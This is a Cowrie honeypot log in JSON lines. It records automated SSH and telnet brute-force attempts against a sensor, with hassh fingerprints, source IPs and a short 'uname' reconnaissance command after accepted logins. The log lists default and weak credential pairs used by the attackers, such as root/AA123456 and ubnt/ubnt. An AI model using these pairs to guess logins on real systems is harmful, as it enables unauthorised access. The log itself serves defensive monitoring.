{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:46.848911Z","src_ip":"212.227.235.229","session":"959216a4ae20"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:47.602234Z","src_ip":"212.227.235.229","session":"959216a4ae20"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:48.855853Z","src_ip":"212.227.235.229","session":"959216a4ae20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60294,"dst_ip":"1.2.3.4","dst_port":22,"session":"0473df616560","protocol":"ssh","message":"New connection: 212.227.125.160:60294 (1.2.3.4:22) [session: 0473df616560]","sensor":"my-vps","timestamp":"2025-08-28T07:00:56.363519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:00:56.364321Z","src_ip":"212.227.125.160","session":"0473df616560"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:00:56.578832Z","src_ip":"212.227.125.160","session":"0473df616560"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:00:57.225510Z","src_ip":"212.227.125.160","session":"0473df616560"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:00:58.442602Z","src_ip":"212.227.125.160","session":"0473df616560"}
{"eventid":"cowrie.session.closed","duration":33.46554160118103,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:00.656958Z","src_ip":"8.222.212.69","session":"0a3dcbe99afa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56594,"dst_ip":"1.2.3.4","dst_port":22,"session":"48dce2170ba4","protocol":"ssh","message":"New connection: 212.227.235.229:56594 (1.2.3.4:22) [session: 48dce2170ba4]","sensor":"my-vps","timestamp":"2025-08-28T07:01:02.843642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:02.844955Z","src_ip":"212.227.235.229","session":"48dce2170ba4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:03.098718Z","src_ip":"212.227.235.229","session":"48dce2170ba4"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:01:03.865764Z","src_ip":"212.227.235.229","session":"48dce2170ba4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:05.122760Z","src_ip":"212.227.235.229","session":"48dce2170ba4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34400,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e6c04ad3eba","protocol":"ssh","message":"New connection: 212.227.125.160:34400 (1.2.3.4:22) [session: 0e6c04ad3eba]","sensor":"my-vps","timestamp":"2025-08-28T07:01:12.684245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:12.688097Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:12.916130Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54998,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c0ae05dfd74","protocol":"telnet","message":"New connection: 8.222.212.69:54998 (1.2.3.4:23) [session: 6c0ae05dfd74]","sensor":"my-vps","timestamp":"2025-08-28T07:01:13.749147Z"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:01:13.845166Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:01:14.390563Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:01:14.391319Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:14.625355Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:14.626608Z","src_ip":"212.227.125.160","session":"0e6c04ad3eba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38810,"dst_ip":"1.2.3.4","dst_port":23,"session":"91ffbad0f041","protocol":"telnet","message":"New connection: 212.227.235.229:38810 (1.2.3.4:23) [session: 91ffbad0f041]","sensor":"my-vps","timestamp":"2025-08-28T07:01:15.923515Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40370,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeabdb21825c","protocol":"ssh","message":"New connection: 212.227.235.229:40370 (1.2.3.4:22) [session: eeabdb21825c]","sensor":"my-vps","timestamp":"2025-08-28T07:01:19.304556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:19.305390Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:19.555819Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:01:20.308894Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:01:20.828079Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:01:20.829012Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:21.081229Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:21.082288Z","src_ip":"212.227.235.229","session":"eeabdb21825c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43684,"dst_ip":"1.2.3.4","dst_port":22,"session":"61b5d7da9e22","protocol":"ssh","message":"New connection: 212.227.125.160:43684 (1.2.3.4:22) [session: 61b5d7da9e22]","sensor":"my-vps","timestamp":"2025-08-28T07:01:29.016507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:29.034335Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:29.234307Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:01:30.104679Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:01:30.643687Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:01:30.644511Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:30.863431Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:30.864621Z","src_ip":"212.227.125.160","session":"61b5d7da9e22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34048,"dst_ip":"1.2.3.4","dst_port":22,"session":"963b1f2de482","protocol":"ssh","message":"New connection: 212.227.235.229:34048 (1.2.3.4:22) [session: 963b1f2de482]","sensor":"my-vps","timestamp":"2025-08-28T07:01:35.664637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:35.665400Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:35.915054Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:01:36.665488Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:01:37.188164Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:01:37.189217Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:37.440578Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:37.441754Z","src_ip":"212.227.235.229","session":"963b1f2de482"}
{"eventid":"cowrie.session.closed","duration":30.710773229599,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:44.459857Z","src_ip":"8.222.212.69","session":"6c0ae05dfd74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37030,"dst_ip":"1.2.3.4","dst_port":22,"session":"d546a6871372","protocol":"ssh","message":"New connection: 212.227.125.160:37030 (1.2.3.4:22) [session: d546a6871372]","sensor":"my-vps","timestamp":"2025-08-28T07:01:45.362975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:45.364059Z","src_ip":"212.227.125.160","session":"d546a6871372"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:01:45.590189Z","src_ip":"212.227.125.160","session":"d546a6871372"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T07:01:46.502748Z","src_ip":"212.227.125.160","session":"d546a6871372"}
{"eventid":"cowrie.session.closed","duration":30.777069568634033,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:46.700519Z","src_ip":"212.227.235.229","session":"91ffbad0f041"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:01:47.732426Z","src_ip":"212.227.125.160","session":"d546a6871372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58944,"dst_ip":"1.2.3.4","dst_port":22,"session":"79faad96282e","protocol":"ssh","message":"New connection: 212.227.235.229:58944 (1.2.3.4:22) [session: 79faad96282e]","sensor":"my-vps","timestamp":"2025-08-28T07:01:52.003690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:01:52.004726Z","src_ip":"212.227.235.229","session":"79faad96282e"}
